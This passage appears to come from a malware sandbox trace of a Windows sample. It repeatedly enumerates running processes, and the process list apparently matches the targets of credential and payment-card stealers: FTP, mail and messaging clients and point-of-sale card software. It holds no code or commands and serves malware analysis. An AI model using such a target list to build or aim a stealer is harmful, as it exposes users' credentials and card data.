cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.401] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0155.402] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0155.404] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0155.405] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0155.407] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0155.409] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0155.411] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0155.420] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0155.423] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0155.425] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0155.427] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0155.429] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0155.431] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0155.434] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0155.436] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0155.438] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0155.440] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0155.442] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0155.444] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0155.446] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0155.448] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0155.450] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0155.453] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0155.455] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0155.457] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0155.469] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0155.471] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0155.472] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0155.475] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0155.477] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0155.480] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0155.482] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0155.485] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0155.487] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0155.490] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0155.493] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0155.496] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0155.498] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0155.501] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0155.503] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0155.511] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0155.635] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0155.638] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0155.640] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0155.643] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0155.645] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0155.648] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0155.650] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0155.652] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0155.655] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0155.657] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0155.659] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0155.662] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0155.664] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0155.669] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0155.671] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0155.673] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0155.675] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0155.678] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0155.680] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0155.682] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0155.684] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0155.687] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0155.689] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0155.691] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0155.693] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0155.695] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0155.697] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0155.700] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0155.702] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0155.704] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0155.710] CloseHandle (hObject=0x1c50) returned 1 [0155.711] Sleep (dwMilliseconds=0x64) [0155.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c7c [0155.845] Process32First (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.847] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0155.849] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0155.851] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.853] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0155.855] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.856] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0155.858] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0155.860] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0155.862] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.954] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.956] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0155.958] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: 